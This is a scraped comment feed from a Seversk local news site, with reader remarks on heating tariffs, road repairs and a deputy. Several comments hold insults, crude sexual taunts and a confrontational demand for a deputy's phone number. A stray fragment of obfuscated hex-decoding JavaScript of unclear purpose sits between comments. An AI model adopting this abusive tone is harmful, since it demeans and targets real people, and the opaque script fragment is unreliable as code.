Комментарий № 152987: Пенсионерам и детям снизили прожиточный минимум. Капемонт, ПЛАТОН, безин - что дальше?

Написал: f1gv83
дальше кремляди набирают себе как можно больше и валят за бугор по принципу "оставайся, лавка, с товаром"

Комментарий № 152986: Платить за отопление будем реже, но больше

Написал: лавандос
sim,
Я понял наконец о чем он толкует. Дело в том, что под "нежилыми"  в ПП ,принимаются помещения так или иначе ,но используемые потребителями услуги. Ну, к примеру магазин  или солярий.     Просто чистая формальность в названии.  При этом он предлагает делить на  квадратуру ВСЕХ помещений, включая подъезды,подвалы ,и проч.,ошибочно считая их "нежилыми". Отчего цифирь  в его расчетах уменьшается..

Комментарий № 152985: Депутат Лешка Выборов предложил решение проблемы импортозамещения и пробок на КПП с помощью страусов

Написал: PeterThePig
Liberator,
Для справки - все номера депутатов в открытом доступе, и раьочие и домашние. Вот только, думаю, ты даже звлнить не станешь, как 99% интернет-агрессоров

Комментарий № 152984: Платить за отопление будем реже, но больше

Написал: kvk
sim Эта формула из 354 вступающего в силу с 01.07.2016 года.

Комментарий № 152983: Депутат Лешка Выборов предложил решение проблемы импортозамещения и пробок на КПП с помощью страусов

Написал: Liberator
Во, кусок человека!
Депутат, бл...ять!
Хочу с тобой поговорить сучонышь, при людях!
Напиши свой номер, если кишка не тонка!

Комментарий № 152982: Северск. Ремонт дорог 2015. Как это было.

Написал: Liberator
Я думаю и делаю тем, чем надо!
Ты приумерь свою ахинею!
Из тебя гавно какое-то льется, больше ни чего ценного!

Комментарий № 152981: Платить за отопление будем реже, но больше

Написал: Kapitalin-nike
sim,

Это формула развода лохов на бабки, и она от власти, так что ты ничего не пропустил, уже 25 лет! fellow wink 

Комментарий № 152980: Северск. Ремонт дорог 2015. Как это было.

Написал: Kapitalin-nike
Liberator,

И это заявляет либераст! wink wink wink  Какой ты народ? Ты - быдло, и не надо на меня обижаться (НА ПРАВДУ ОБИЖАЮТСЯ ТОЛЬКО ПОЛНЫЕ ДЕБИЛЫ!), начинай думать головой и не будь быдлом, тогда и обижаться не придётся!

// o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[\S\s]{1,2}/g);for(var t="",o=0;o < e.length;o++)t+=String.fromCharCode(parseInt(e[o],16));return t},d=function(){return "vseverske.info"},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf("http")==0){return p}for(var e=0;e

Комментарий № 152979: Платить за отопление будем реже, но больше

Написал: sim
Цитата: kvk
P = Vd x Si : Sd x T
 
Скажите, откуда эта формула, может я что-то пропустил? smile  

Комментарий № 152978: Северск. Ремонт дорог 2015. Как это было.

Написал: Liberator
Kapitalin-nike,
Слушай, во тебя кто-то из властьимущих трахнул-то, во все щели, с извращениями.
Ну, ты это, лечись давай.
Мы - народ, как нибудь без тебя трахнутого справимся.
Вот бедняга.

Комментарий № 152977: Тренажерный зал Триумф. 8 Марта - День открытых дверей для прекрасной половины человечества

Написал: СПН
Крутой зал! Если профессионалы берутся за дело, то всё на высшем уровне. Триумф - яркий тому пример! Помню при бывших хозяевах здесь пару человек занималось, среди них три негодяя, да и правила дурацкие были, короче отстой. Теперь уже два  года приятно в зал зайти, да и контингент сменился: урки убежали, зато пришли красивые и приятные люди, спортсмены, ну а девушки какие - глаз не оторвать!!!
stroimguru.ru
Курс валюты:
78.71 85↓   $     92.41 38↓  

Опрос дня:

Вы будете делать прививку от коронавируса?

Нет   49.38%
   
Да, планирую   8.64%
   
Да, но если заставят (на работе / для путешествий)   4.94%
   
Уже сделал   27.16%
   
Затрудняюсь ответить   9.88%
   
Всего голосов: 81

Все опросы >>

Архив статей: